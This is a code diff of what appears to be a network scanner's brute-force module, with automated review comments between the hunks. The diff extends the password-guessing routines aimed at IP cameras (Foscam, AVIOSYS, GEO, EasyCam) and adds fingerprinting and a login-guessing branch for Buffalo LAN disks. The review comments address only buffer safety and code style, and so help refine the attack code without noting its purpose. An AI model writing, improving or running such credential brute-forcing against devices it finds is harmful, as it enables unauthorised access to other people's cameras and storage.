diff --git a/connector.cpp b/connector.cpp
index 77fd149..05f4b60 100644
--- a/connector.cpp
+++ b/connector.cpp
@@ -381,6 +381,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcat(hRqst, path);
strcat(hRqst, " HTTP/1.1\r\nHost: ");
strcat(hRqst, ip);
+ if(port != 80){
+ strcat(hRqst, ":");
+ char tbuff[16] = {0};
+ strcat(hRqst, itoa(port, tbuff, 10));
+ };
if(cookieLen != 0)
{
strcat(hRqst, "\r\nCookie: ");
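Review bot: The added port suffix is appended to `hRqst` with unbounded `strcat`, and the buffer's capacity is declared outside the hunk, so nothing here shows that `ip`, `path`, the cookie and the extra `:port` fit. The same five lines are pasted into every other Host-building hunk of this commit: the remaining `_BABrute` and `_IPCameraBrute` hunks, and the `redirectReconnect` hunks in finder.cpp, where the values written to `mes` look like they derive from a remote redirect and so deserve the strictest bound. One helper that takes the destination and its capacity and writes with `snprintf(dst + len, cap - len, ":%d", port)` would bound the write, drop the non-standard `itoa`, and remove the duplication. `_BABrute` continues outside the hunk.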
@@ -577,6 +582,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcat(request, path);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
if(cookieLen != 0)
{
strcat(request, "\r\nCookie: ");
@@ -614,6 +624,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcat(request, path);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
if(cookieLen != 0)
{
strcat(request, "\r\nCookie: ");
@@ -1934,8 +1949,7 @@ lopaStr _WFBrut(char *cookie, char *ip, int port, char *methodVal, char *actionV
strcat(request, "\r\nCookie: ");
strcat(request, cookie);
};
- strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\n");
- strcat(request, "Content-length: ");
+ strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\nContent-Length: ");
strcat(request, itoa(strlen(argData), b, 10));
strcat(request, "\r\n\r\n");
@@ -2324,6 +2338,10 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
{
negVector.push_back("Password Error");
}
+ else if(strcmp(SPEC, "BUFFALO") == 0)
+ {
+ negVector.push_back("403 Forbidden");
+ }
else
{
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
@@ -2358,7 +2376,12 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, "&pwd=");
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
- strcat(request, ip);
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "GEO") == 0)
@@ -2369,6 +2392,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "EasyCam") == 0)
@@ -2383,6 +2411,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "Foscam") == 0)
@@ -2397,6 +2430,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "AVIOSYS") == 0)
@@ -2407,7 +2445,38 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
+ }
+ else if(strcmp(SPEC, "BUFFALO") == 0)
+ {
+ strcpy(request, "POST /rpc/login HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
+ int loginLength = strlen(login);
+ int passLength = strlen(pass);
+ int sz = loginLength + passLength + strlen("user=&password=");
+ char *passString = new char[sz + 1];
+ ZeroMemory(passString, sizeof(passString));
+ strcpy(passString, "user=");
+ strcat(passString, login);
+ strcat(passString, "&password=");
+ strcat(passString, pass);
+ strcat(request, "\r\nContent-Length: ");
+ char tempBuff[16] = {0};
+ strcat(request, itoa(sz, tempBuff, 10));
+ strcat(request, "\r\n\r\n");
+ strcat(request, passString);
+ delete []passString;
};
int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector);
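Review bot: `ZeroMemory(passString, sizeof(passString))` in the new BUFFALO branch clears only `sizeof(char *)` bytes, because `passString` is a pointer, not an array; the rest of the `new char[sz + 1]` allocation stays uninitialised until `strcpy` writes it. The call can be dropped, since the `strcpy` that follows terminates the string, or written as `ZeroMemory(passString, sz + 1);`. The manual `new[]`/`delete[]` pair would also leak if an early return were ever added between them; `std::string body = std::string("user=") + login + "&password=" + pass;` avoids both problems, assuming `<string>` is already usable in this file. The body is then appended to `request` with unbounded `strcat`, and the capacity of `request` is not visible here, so the combined length of `login` and `pass` should be checked against it first. `_IPCameraBrute` starts and ends outside the hunk.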
@@ -2534,10 +2603,12 @@ int Connector::_ConnectToPort(char *ip, const char *portC, char *hl)
int strFlag = 0;
strcpy(mes, buff1);
strcat(mes, ip);
- strcat(mes, ":");
- strcat(mes, portC);
- strcat(mes, buff2);
int port = atoi(portC);
+ if(port != 80){
+ strcat(mes, ":");
+ strcat(mes, portC);
+ };
+ strcat(mes, buff2);
int cRes;
if(port == 443) cRes = _EstablishSSLConnection(ip, port, mes, &CSTR);
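Review bot: `int port = atoi(portC);` now decides whether the new `":" + portC` suffix is written, but `atoi` returns 0 for non-numeric input and has undefined behaviour for out-of-range values, so a malformed `portC` cannot be told apart from a real port. Parsing with `strtol`, then checking the end pointer and the 1–65535 range before `mes` is built, would make that failure explicit. The `strcat` calls into `mes` are unbounded, and the buffer is declared outside the hunk, so its size should be confirmed against `buff1 + ip + portC + buff2`.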
diff --git a/finder.cpp b/finder.cpp
index 1e722af..a2b358d 100644
--- a/finder.cpp
+++ b/finder.cpp
@@ -181,7 +181,7 @@ int Lexems::globalSearchNeg(const char *buffcpy, char *ip, int port)
{
if(gNegDebugMode)
{
- stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\"");
+ stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\"");
if(strlen(negWord) < 2)
{
stt->doEmitionDebugFoundData(" Len:" + QString::number(strlen(negWord)));
@@ -290,6 +290,7 @@ int _mainFinderFirst(char *buffcpy, int f, int port, char *ip)
&& strstr(buffcpy, "g_ologin.dologin()") != NULL
) return 44; //hikvision cam 2
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
+ if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
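Review bot: The new return value `46` is a bare literal whose meaning exists only in the trailing comment, and the identical line is repeated in `_mainFinderSecond` and matched again as `flag == 46` in `Lexems::_filler`. A shared named constant, for example `static const int FLAG_BUFFALO_DISK = 46;` in a common header, used at all three sites would keep detection and dispatch from drifting apart when the next flag is added. Both function bodies continue outside their hunks.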
@@ -358,6 +359,8 @@ int _mainFinderSecond(char *buffcpy, int port, char *ip)
&& strstr(buffcpy, "g_ologin.dologin()") != NULL
) return 44; //hikvision cam 2
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
+ if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
+
if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL)
|| (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam
@@ -1708,7 +1711,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
}
else if(flag == 38) //Foscam
{
- _specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Basic Authorization", cp, recd, "Foscam");
+ _specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Web Authorization", cp, recd, "Foscam");
}
else if(flag == 39) //EagleEye
{
@@ -1720,7 +1723,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
}
else if(flag == 41) //AVIOSYS-camera
{
- _specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Basic Authorization", cp, recd, "AVIOSYS");
+ _specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Web Authorization", cp, recd, "AVIOSYS");
}
else if(flag == 42) //NW_camera
{
@@ -1738,6 +1741,10 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
{
_specBrute(ps.cookie, ip, p, hl, "[Panasonic] IP Camera", flag, "/config/index.cgi", "[Panasonic] IP Camera", "Basic Authorization", cp, recd, "");
}
+ else if(flag == 46) //Buffalo disk
+ {
+ _specWEBIPCAMBrute(ip, p, hl, "[Buffalo] Lan Disk", flag, "[Buffalo] Lan Disk", "Web Authorization", cp, recd, "BUFFALO");
+ }
else if(flag == 20) //AXIS Camera
{
_specBrute(ps.cookie, ip, p, hl, "AXIS Camera", flag, "/axis-cgi/com/ptz.cgi?", "AXIS Camera", "Basic Authorization", cp, recd, "");
@@ -1901,6 +1908,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, tempIP);
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
@@ -2028,9 +2040,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, tempIP);
- strcat(mes, ":");
- char tbuff[16] = {0};
- strcat(mes, itoa(tempPort, tbuff, 10));
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
@@ -2129,6 +2143,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, ip);
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
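Review bot: This block pairs `ip` with `tempPort` in the Host value, whereas the two earlier `redirectReconnect` hunks pair `tempIP` with `tempPort`. If `tempPort` can hold the redirect target's port while `ip` is still the original address, the header names a host and port combination that does not match the endpoint being contacted. The next hunk (`-2217`) has the same pairing. If the mix is intentional, a comment such as `// same host as the original request; port comes from the redirect` would document it; otherwise `port` looks like the intended variable, which needs confirming against the branch condition outside the hunk.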
@@ -2217,6 +2236,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, ip);
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
diff --git a/nesca_3.cpp b/nesca_3.cpp
index 22628bb..c531d61 100644
--- a/nesca_3.cpp
+++ b/nesca_3.cpp
@@ -2194,7 +2194,7 @@ void nesca_3::slotOutData(QString ip, QString str)
str.replace("Accept-Encoding:", "Accept-Encoding:");
str.replace("User-Agent:", "User-Agent:");
str.replace("Connection:", "Connection:");
- str.replace("Content-length:", "Content-length:");
+ str.replace("Content-Length:", "Content-Length:");
str.replace("Authorization:", "Authorization:");
_rOutProt.indexIn(str);
prot = _rOutProt.cap(0);